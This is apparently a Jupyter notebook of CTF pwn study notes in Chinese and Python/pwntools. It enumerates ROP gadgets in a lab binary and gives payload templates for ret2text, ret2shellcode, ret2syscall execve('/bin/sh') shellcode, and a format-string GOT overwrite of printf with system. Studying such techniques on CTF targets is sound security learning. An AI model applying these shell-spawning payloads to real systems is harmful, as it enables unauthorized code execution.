In [1]:
from pwn import *
from rich import print
import path
file_path=path.Path('/home/kali/ctfs/pwn')
file_path.chmod(0o777)

elf=ELF(file_path)
rop=ROP(elf)
print("gadgets: ",rop.gadgets)

[*] '/home/kali/ctfs/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] Loaded 14 cached gadgets for Path('/home/kali/ctfs/pwn')


gadgets: 
{
    4195646: Gadget(0x40053e, ['add esp, 8', 'ret'], [], 0xc),
    4195645: Gadget(0x40053d, ['add rsp, 8', 'ret'], [], 0xc),
    4196203: Gadget(0x40076b, ['leave', 'ret'], ['ebp', 'esp'], 0x2540be403),
    4196396: Gadget(0x40082c, ['pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['r12', 'r13', 'r14', 'r15'], 
0x14),
    4196398: Gadget(0x40082e, ['pop r13', 'pop r14', 'pop r15', 'ret'], ['r13', 'r14', 'r15'], 0x10),
    4196400: Gadget(0x400830, ['pop r14', 'pop r15', 'ret'], ['r14', 'r15'], 0xc),
    4196402: Gadget(0x400832, ['pop r15', 'ret'], ['r15'], 0x8),
    4196395: Gadget(0x40082b, ['pop rbp', 'pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r12', 'r13',
'r14', 'r15'], 0x18),
    4196399: Gadget(0x40082f, ['pop rbp', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r14', 'r15'], 0x10),
    4195872: Gadget(0x400620, ['pop rbp', 'ret'], ['rbp'], 0x8),
    4196403: Gadget(0x400833, ['pop rdi', 'ret'], ['rdi'], 0x8),
    4196401: Gadget(0x400831, ['pop rsi', 'pop r15', 'ret'], ['rsi', 'r15'], 0xc),
    4196397: Gadget(0x40082d, ['pop rsp', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rsp', 'r13', 'r14', 'r15'], 
0x14),
    4194950: Gadget(0x400286, ['ret'], [], 0x4)
}

## ret2text
### 64位传参
> 当参数少于7个时， 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
当参数为7个以上时， 前 6 个与前面一样， 但后面的依次从 “右向左” 放入栈中，即和32位汇编一样。
参数个数大于 7 个的时候
H(a, b, c, d, e, f, g, h);
a->%rdi, b->%rsi, c->%rdx, d->%rcx, e->%r8, f->%r9
h->8(%esp)
g->(%esp)
call H

### payload
```
payload = 'a' * 136 + 'b' *4 + p32(system_plt).decode('unicode_escape') +p32(main_addr).decode('unicode_escape') + p32(binsh).decode('unicode_escape')
# b填充ebp,system填充返回地址，main填充函数调用的返回地址，binsh填充函数调用的参数

payload = b'a'*0x80+b'b'*8 #首先b填充到rbp
payload += p64(pop_rdi_ret)+p64(binsh)#设置rdi=bin/sh
payload += p64(system_plt)#ret到system_plt地址
```

In [9]:
context(os='linux', arch='amd64', log_level='info')
if 'system' in elf.plt:
    print("system plt",elf.plt['system'])
    print("system symbols",elf.symbols['system'])
    print("system got",elf.got['system'])
print("/bin/sh",list(elf.search(b'/bin/sh')))
print(rop.find_gadget(['pop rdi','ret']))

/bin/sh
[]

Gadget(0x400833, ['pop rdi', 'ret'], ['rdi'], 0x8)

## ret2shellcode
### payload
```
jmp_esp=elf.search(asm('jmp rsp')).__next__()
payload=b'A'*0x88+p64(jmp_esp)+asm(shellcraft.sh()) # jmpesp填充返回地址，跳转到sh
```

In [ ]:
print("jmp rsp",list(elf.search(asm('jmp rsp'))))

## retsyscall
> 用户进程在执行系统调用前，先把系统调用名（实际上是系统调用号）、输入参数等放到寄存器上(EBX,ECX等寄存器)
然后发出int 0x80指令，即触发xxx号中断
系统暂停用户进程，根据xxx号中断找到中断服务程序，这个程序名就叫system_call()
system_call()接着执行。它会从寄存器中找到系统调用名、输入参数等，并根据系统调用上下文中找到引发系统调用的进程；执行完毕后它又会把输出结果放到寄存器中。
系统恢复用户进程，进程从寄存器中取到自己想要的东西，然后继续执行。

### 系统调用
```
// 字符串：/bin///sh
push 0x68
push 0x732f2f2f
push 0x6e69622f
// ebx ecx edx 传参
mov ebx,esp
xor ecx,ecx
xor edx,edx
// eax = 系统调用号
push 11
pop eax
// Linux 系统调用
int 0x80
```
```
pop_eax = p32(0x080bb196)
pop_edx_ecx_ebx = p32(0x0806eb90)
bin_sh = p32(0x080be408)
int_0x80 = p32(0x08049421)
offset = 112
payload=flat(['a'*offset, pop_eax, 0xb, pop_edx_ecx_ebx, 0, 0, bin_sh,int_0x80])
```
## ret2libc
## ret2dlresolve
## ret2csu
## print
```
payload=fmtstr_payload(10,{elf.got['printf']:elf.plt['system']}) #system替换printf
p.sendline(b'/bin/sh\x00')
```

In [21]:
!ldd $file_path
print(rop.find_gadget(['pop eax','ret']))
print(rop.find_gadget(['int 0x80']))
for gadget in rop.gadgets.values():
    if set(['pop edx','pop ebx','pop ecx','ret']).issubset(set(gadget.insns)):
        print(gadget)

	linux-vdso.so.1 (0x00007ffcf752d000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f10f6d9c000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f10f6f8a000)


None

None

In [14]:
sh = process(file_path)


s